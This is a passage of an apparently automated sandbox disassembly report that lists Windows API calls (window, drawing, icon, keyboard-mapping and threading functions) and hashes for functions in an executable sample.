                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageSend
                                                    • String ID:
                                                    • API String ID: 1871949834-0
                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                    • SendMessageW.USER32 ref: 00471AE3
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 3611059338-0
                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                    • String ID:
                                                    • API String ID: 1640429340-0
                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcslen.LIBCMT ref: 004438CD
                                                    • _wcslen.LIBCMT ref: 004438E6
                                                    • _wcstok.LIBCMT ref: 004438F8
                                                    • _wcslen.LIBCMT ref: 0044390C
                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                    • _wcstok.LIBCMT ref: 00443931
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                    • String ID:
                                                    • API String ID: 3632110297-0
                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 752480666-0
                                                    • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                    • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                    • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                    • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                    • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                    APIs
                                                    • SendMessageW.USER32 ref: 004555C7
                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                    • String ID:
                                                    • API String ID: 3691411573-0
                                                    • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                    • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                    • EndPath.GDI32(?), ref: 004472D6
                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                    • String ID:
                                                    • API String ID: 372113273-0
                                                    • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                    • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041708E
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                    • __lock.LIBCMT ref: 004170BE
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                    • _free.LIBCMT ref: 004170EE
                                                    • InterlockedIncrement.KERNEL32(00AA2D90), ref: 00417106
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                    • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
